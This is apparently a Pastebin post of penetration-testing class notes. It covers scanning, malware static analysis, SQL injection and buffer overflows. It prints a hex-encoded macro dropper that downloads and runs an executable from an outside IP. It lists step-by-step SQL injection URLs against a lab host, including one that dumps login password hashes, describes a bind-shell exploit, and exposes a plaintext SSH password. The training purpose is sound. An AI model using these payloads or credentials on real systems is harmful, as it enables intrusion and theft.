Advertisement
joemccray

Just playing around....

Apr 24th, 2019
3,422
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.24 KB | None | 0 0
  1. #########################
  2. # Connect to the server #
  3. #########################
  4.  
  5. Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.
  6.  
  7. You can download Putty from here:
  8. http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  9.  
  10.  
  11. IP Address: 144.202.37.49
  12. Protocol: ssh
  13. Port: 22
  14. username: np
  15. password: n3ts1m123!
  16.  
  17.  
  18.  
  19.  
  20. ########################
  21. # Scanning Methodology #
  22. ########################
  23.  
  24. - Ping Sweep
  25. What's alive?
  26. ------------
  27.  
  28. ---------------------------Type This-----------------------------------
  29. sudo nmap -sP 157.166.226.*
  30.  
  31. -----------------------------------------------------------------------
  32.  
  33.  
  34.  
  35. -if -SP yields no results try:
  36. ---------------------------Type This-----------------------------------
  37. sudo nmap -sL 157.166.226.*
  38.  
  39. -----------------------------------------------------------------------
  40.  
  41.  
  42.  
  43. -Look for hostnames:
  44. ---------------------------Type This-----------------------------------
  45. sudo nmap -sL 157.166.226.* | grep com
  46.  
  47. -----------------------------------------------------------------------
  48.  
  49.  
  50.  
  51. - Port Scan
  52. What's where?
  53. ------------
  54. ---------------------------Type This-----------------------------------
  55. sudo nmap -sS 162.243.126.247
  56.  
  57. -----------------------------------------------------------------------
  58.  
  59.  
  60.  
  61. - Bannergrab/Version Query
  62. What versions of software are running
  63. -------------------------------------
  64.  
  65. ---------------------------Type This-----------------------------------
  66. sudo nmap -sV 162.243.126.247
  67.  
  68. -----------------------------------------------------------------------
  69.  
  70.  
  71.  
  72.  
  73. - Vulnerability Research
  74. Lookup the banner versions for public exploits
  75. ----------------------------------------------
  76. http://exploit-db.com
  77. http://securityfocus.com/bid
  78. https://packetstormsecurity.com/files/tags/exploit/
  79.  
  80. ---------------------------------------------------------------------------------------------------------------------------------
  81. The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
  82.  
  83.  
  84. Issue 1. Lack of a thorough attack process
  85. ==========================================
  86. - Host discovery
  87. - Service discovery
  88. - Service version discovery
  89. - Vulnerability research
  90. - Linux (port 111)/Window (port 445) Enumeration
  91. - Webserver vulnerability scan
  92. - Directory brute force every webserver
  93. - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
  94. - Brute force all services
  95.  
  96.  
  97. Issue 2. Lack of automation of the process
  98. ==========================================
  99. - Research attacks scripts on the internet to enhance your methodology
  100.  
  101.  
  102. Issue 3. Failing to document all steps being performed and their output
  103. =======================================================================
  104.  
  105.  
  106. Issue 4. Lack of sleep during the exam
  107. ======================================
  108.  
  109.  
  110. Issue 5. Failing to reboot target machines prior to attack
  111. ==========================================================
  112.  
  113.  
  114.  
  115. --------------------------------------------------------------------------------------------------------------
  116.  
  117.  
  118. A good strategy to use to prepare would be:
  119.  
  120. Step 1. Ensure that you are comfortable with Linux
  121. --------------------------------------------------
  122. - LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
  123. - Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
  124.  
  125. You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
  126. https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
  127. https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
  128. https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
  129.  
  130.  
  131.  
  132. 2. You should be comfortable with the following tools:
  133. ------------------------------------------------------
  134.  
  135. Nmap:
  136. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
  137.  
  138. Metasploit:
  139. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
  140.  
  141. Burp Suite:
  142. https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
  143.  
  144. Sqlmap:
  145. https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
  146.  
  147. Nikto:
  148. https://www.youtube.com/watch?v=GH9qn_DBzCk
  149.  
  150. Enum4Linux:
  151. https://www.youtube.com/watch?v=hA5raaGOQKQ
  152.  
  153. RPCINFO/SHOWMOUNT:
  154. https://www.youtube.com/watch?v=FlRAA-1UXWQ
  155.  
  156. Hydra:
  157. https://www.youtube.com/watch?v=rLtj8tEmGso
  158.  
  159.  
  160.  
  161. 3. You need to comfortable with basic exploit development
  162. ---------------------------------------------------------
  163.  
  164. Basic assembly:
  165. https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
  166.  
  167. Basic exploit development (first 5 videos in the playlist):
  168. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  169.  
  170.  
  171. 4. You need to be comfortable with privilege escalation
  172. -------------------------------------------------------
  173. Linux
  174. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  175.  
  176. Windows
  177. https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
  178. http://www.fuzzysecurity.com/tutorials/16.html
  179.  
  180. ----------------------------------------------------------------------------------------------------------------------------------
  181.  
  182.  
  183. ###################
  184. # Static Analysis #
  185. ###################
  186.  
  187. - After logging please open a terminal window and type the following commands:
  188.  
  189.  
  190. ---------------------------Type This-----------------------------------
  191. cd ~
  192.  
  193. mkdir static_analysis
  194.  
  195. cd static_analysis
  196.  
  197. wget http://45.63.104.73/wannacry.zip
  198.  
  199. unzip wannacry.zip
  200. infected
  201.  
  202. file wannacry.exe
  203.  
  204. mv wannacry.exe malware.pdf
  205.  
  206. file malware.pdf
  207.  
  208. mv malware.pdf wannacry.exe
  209.  
  210. hexdump -n 2 -C wannacry.exe
  211.  
  212. ----------------------------------------------------------------------
  213.  
  214.  
  215. ***What is '4d 5a' or 'MZ'***
  216. Reference:
  217. http://www.garykessler.net/library/file_sigs.html
  218.  
  219.  
  220.  
  221.  
  222. ---------------------------Type This-----------------------------------
  223. objdump -x wannacry.exe
  224.  
  225. strings wannacry.exe
  226.  
  227. strings wannacry.exe | grep -i dll
  228.  
  229. strings wannacry.exe | grep -i library
  230.  
  231. strings wannacry.exe | grep -i reg
  232.  
  233. strings wannacry.exe | grep -i key
  234.  
  235. strings wannacry.exe | grep -i rsa
  236.  
  237. strings wannacry.exe | grep -i open
  238.  
  239. strings wannacry.exe | grep -i get
  240.  
  241. strings wannacry.exe | grep -i mutex
  242.  
  243. strings wannacry.exe | grep -i irc
  244.  
  245. strings wannacry.exe | grep -i join
  246.  
  247. strings wannacry.exe | grep -i admin
  248.  
  249. strings wannacry.exe | grep -i list
  250. ----------------------------------------------------------------------
  251.  
  252.  
  253. #####################################################
  254. # Analyzing Macro Embedded Malware #
  255. #####################################################
  256. ---------------------------Type This-----------------------------------
  257. mkdir ~/oledump
  258.  
  259. cd ~/oledump
  260.  
  261. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  262.  
  263. unzip oledump_V0_0_22.zip
  264.  
  265. wget http://45.63.104.73/064016.zip
  266.  
  267. unzip 064016.zip
  268. infected
  269.  
  270. python oledump.py 064016.doc
  271.  
  272. python oledump.py 064016.doc -s A4 -v
  273. -----------------------------------------------------------------------
  274.  
  275.  
  276.  
  277. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  278. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  279.  
  280. ---------------------------Type This-----------------------------------
  281. python oledump.py 064016.doc -s A5 -v
  282. -----------------------------------------------------------------------
  283.  
  284. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  285.  
  286. ---------------------------Type This-----------------------------------
  287. python oledump.py 064016.doc -s A3 -v
  288.  
  289. - Look for "GVhkjbjv" and you should see:
  290.  
  291. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  292.  
  293. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  294. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  295. -----------------------------------------------------------------------
  296.  
  297. ##################################
  298. # Basic: Web Application Testing #
  299. ##################################
  300.  
  301. Most people are going to tell you reference the OWASP Testing guide.
  302. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  303.  
  304. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  305.  
  306.  
  307. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  308.  
  309. 1. Does the website talk to a DB?
  310. - Look for parameter passing (ex: site.com/page.php?id=4)
  311. - If yes - try SQL Injection
  312.  
  313. 2. Can I or someone else see what I type?
  314. - If yes - try XSS
  315.  
  316. 3. Does the page reference a file?
  317. - If yes - try LFI/RFI
  318.  
  319. Let's start with some manual testing against 45.77.162.239
  320.  
  321.  
  322. Start here:
  323. ---------------------------Paste this into Firefox-----------------------------------
  324. http://45.77.162.239/
  325. -----------------------------------------------------------------------
  326.  
  327. Let's try throwing a single quote (') in there:
  328. ---------------------------Paste this into Firefox-----------------------------------
  329. http://45.77.162.239/bookdetail.aspx?id=2'
  330. -------------------------------------------------------------------------------------
  331.  
  332. I get the following error:
  333.  
  334. Unclosed quotation mark after the character string ''.
  335. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
  336.  
  337. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344.  
  345.  
  346.  
  347.  
  348. #########################################################################################
  349. # SQL Injection #
  350. # https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
  351. #########################################################################################
  352.  
  353.  
  354. - Another quick way to test for SQLI is to remove the parameter value
  355.  
  356.  
  357. #############################
  358. # Error-Based SQL Injection #
  359. #############################
  360. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  361. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  362. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  363. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  364. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  365. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  366. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  367. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  368. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  369. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  370. ---------------------------------------------------------------------------------------------------------
  371.  
  372.  
  373.  
  374.  
  375.  
  376. #############################
  377. # Union-Based SQL Injection #
  378. #############################
  379. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  380. http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
  381. http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
  382. http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
  383. http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
  384. http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
  385. http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
  386. http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
  387. http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
  388. http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
  389. http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  390. ---------------------------------------------------------------------------------------------------------
  391.  
  392. We are using a union select statement because we are joining the developer's query with one of our own.
  393. Reference:
  394. http://www.techonthenet.com/sql/union.php
  395. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  396. It removes duplicate rows between the various SELECT statements.
  397.  
  398. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  399. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  400. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  401. ---------------------------------------------------------------------------------------------------------
  402. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  403.  
  404. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  405. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  406. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  407. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  408. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  409. ---------------------------------------------------------------------------------------------------------
  410.  
  411.  
  412.  
  413.  
  414. - Another way is to see if you can get the backend to perform an arithmetic function
  415. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  416. http://45.77.162.239/bookdetail.aspx?id=(2)
  417. http://45.77.162.239/bookdetail.aspx?id=(4-2)
  418. http://45.77.162.239/bookdetail.aspx?id=(4-1)
  419. ---------------------------------------------------------------------------------------------------------
  420.  
  421. - This is some true/false logic testing
  422. ---------------------------Paste this into Firefox-----------------------------------
  423. http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
  424. http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
  425. http://45.77.162.239/bookdetail.aspx?id=1*1
  426. http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
  427. http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
  428. http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
  429. http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
  430. http://45.77.162.239/bookdetail.aspx?id=2 &0#
  431. -------------------------------------------------------------------------------------
  432.  
  433. -- Now that we've seen the differences in the webpage with True/False SQL Injection - let's see what we can learn using it
  434. ---------------------------Paste this into Firefox-----------------------------------
  435. http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
  436. http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
  437. http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
  438. http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
  439. ---------------------------------------------------------------------------------------
  440.  
  441.  
  442. ###############################
  443. # Blind SQL Injection Testing #
  444. ###############################
  445. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  446.  
  447. 3 - Total Characters
  448. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  449. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  450. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  451. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  452. ---------------------------------------------------------------------------------------------------------
  453.  
  454. Let's go for a quick check to see if it's DBO
  455. ---------------------------Paste this into Firefox-----------------------------------
  456. http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  457. -------------------------------------------------------------------------------------
  458. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  459.  
  460. D - 1st Character
  461. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  462. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  463. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  464. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  465. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  466. ---------------------------------------------------------------------------------------------------------
  467.  
  468. B - 2nd Character
  469. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  470. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  471. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  472. ---------------------------------------------------------------------------------------------------------
  473.  
  474. O - 3rd Character
  475. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  476. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  477. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  478. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  479. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  480. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  481. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
  482. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  483. ---------------------------------------------------------------------------------------------------------
  484.  
  485. #####################################
  486. # Quick Stack Based Buffer Overflow #
  487. #####################################
  488.  
  489. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  490. http://45.63.104.73/ExploitLab.zip
  491.  
  492.  
  493. - Extract the ExploitLab.zip file to your Desktop
  494.  
  495. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  496.  
  497. - Open a new command prompt and type:
  498.  
  499. ---------------------------Type This-----------------------------------
  500.  
  501. nc localhost 9999
  502. --------------------------------------------------------------------------
  503.  
  504. - In the new command prompt window where you ran nc type:
  505. HELP
  506.  
  507. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  508. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  509.  
  510. - Now double-click on 1-simplefuzzer.py
  511. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  512.  
  513.  
  514. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  515.  
  516. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  517.  
  518. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  519.  
  520. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  521.  
  522. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  523.  
  524. - Calculate the distance to EIP by running script 3-3000chars.py
  525. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  526.  
  527. 4-count-chars-to-EIP.py
  528. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  529. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  530.  
  531. 5-2006char-eip-check.py
  532. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  533.  
  534. 6-jmp-esp.py
  535. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  536.  
  537. 7-first-exploit
  538. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  539.  
  540. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  541.  
  542.  
  543. ------------------------------
  544.  
  545.  
  546.  
  547. #########################################
  548. # FreeFloat FTP Server Exploit Analysis #
  549. #########################################
  550.  
  551.  
  552.  
  553. Analyze the following exploit code:
  554. https://www.exploit-db.com/exploits/15689/
  555.  
  556. 1. What is the target platform that this exploit works against?
  557. 2. What is the variable name for the distance to EIP?
  558. 3. What is the actual distance to EIP in bytes?
  559. 4. Describe what is happening in the variable ‘junk2’
  560.  
  561.  
  562.  
  563.  
  564. Analysis of the training walk-through based on EID: 15689:
  565. http://45.63.104.73/ff.zip
  566.  
  567.  
  568.  
  569.  
  570. ff1.py
  571. 1. What does the sys module do? Call System Commands
  572. 2. What is sys.argv[1] and sys.argv[2]?
  573. 3. What application entry point is being attacked in this script?
  574.  
  575.  
  576.  
  577. ff2.py
  578. 1. Explain what is happening in lines 18 - 20 doing.
  579. 2. What pattern_create.rb doing and where can I find it?
  580. 3. Why can’t I just double click the file to run this script?
  581.  
  582.  
  583.  
  584. ff3.py
  585. 1. Explain what is happening in lines 17 - to 25?
  586. 2. Explain what is happening in lines 30 - to 32?
  587. 3. Why is everything below line 35 commented out?
  588.  
  589.  
  590.  
  591. ff4.py
  592. 1. Explain what is happening in lines 13 - to 15.
  593. 2. Explain what is happening in line 19.
  594. 3. What is the total length of buff?
  595.  
  596.  
  597.  
  598. Ff5.py
  599. 1. Explain what is happening in line 15.
  600. 2. What is struct.pack?
  601. 3. How big is the shellcode in this script?
  602.  
  603.  
  604.  
  605. ff6.py
  606. 1. What is the distance to EIP?
  607. 2. How big is the shellcode in this script?
  608. 3. What is the total byte length of the data being sent to this app?
  609.  
  610.  
  611.  
  612.  
  613. ff7.py
  614. 1. What is a tuple in python?
  615. 2. How big is the shellcode in this script?
  616. 3. Did your app crash in from this script?
  617.  
  618.  
  619.  
  620.  
  621. ff8.py
  622. 1. How big is the shellcode in this script?
  623. 2. What is try/except in python?
  624. 3. What is socket.SOCK_STREAM in Python?
  625.  
  626.  
  627.  
  628. ff9.py
  629. 1. What is going on in lines 19 and 20?
  630. 2. What is the length of the NOPs?
  631. 3. What is socket.SOCK_STREAM in Python?
  632.  
  633.  
  634.  
  635.  
  636. ff010.py
  637. 1. What is going on in lines 18 - 20?
  638. 2. What is going on in lines 29 - 32?
  639. 3. How would a stack adjustment help this script?
  640.  
  641.  
  642. Required review videos to watch tonight:
  643. ----------------------------------------
  644. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  645. Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
  646.  
  647. Recommended (not required) videos to watch tonight:
  648. ---------------------------------------------------
  649. For more background on Assembly I would recommend the following video series (videos 1-11):
  650. https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
  651. Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
  652.  
  653.  
  654.  
  655. ---------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement